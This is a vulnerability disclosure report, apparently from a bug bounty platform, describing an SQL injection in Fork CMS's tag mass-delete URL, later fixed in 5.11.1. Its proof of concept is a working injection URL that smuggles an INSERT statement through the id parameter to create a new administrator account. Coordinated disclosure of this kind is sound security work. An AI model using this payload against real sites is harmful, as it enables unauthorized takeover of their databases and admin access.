SQL Injection in forkcms/forkcms

Valid

Reported on

Oct 22nd 2021

Description

When calling the url for deleting one or more tags, the parameter id is vulnerable for SQL injection.

Proof of Concept

Call an URL like this one (as an authenticated user).

http://forkcms.site/private/de/tags/mass_action?token=n93e05rj0l&id[]=3);insert into users(email,password,is_god) values ('attacker@example.com','$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C',1);--+&action=delete

After calling this URL, the table users has a new entry.

Impact

The attacker can tamper data in the database as they want.

We have contacted a member of the forkcms team and are waiting to hear back 2 years ago

We have sent a follow up to the forkcms team. We will try again in 7 days. 2 years ago

Jelmer Prins validated this vulnerability 2 years ago

kstarkloff has been awarded the disclosure bounty

The fix bounty is now up for grabs

Jelmer Prins marked this as fixed in 5.11.1 with commit 0226a2 2 years ago

Jelmer Prins has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation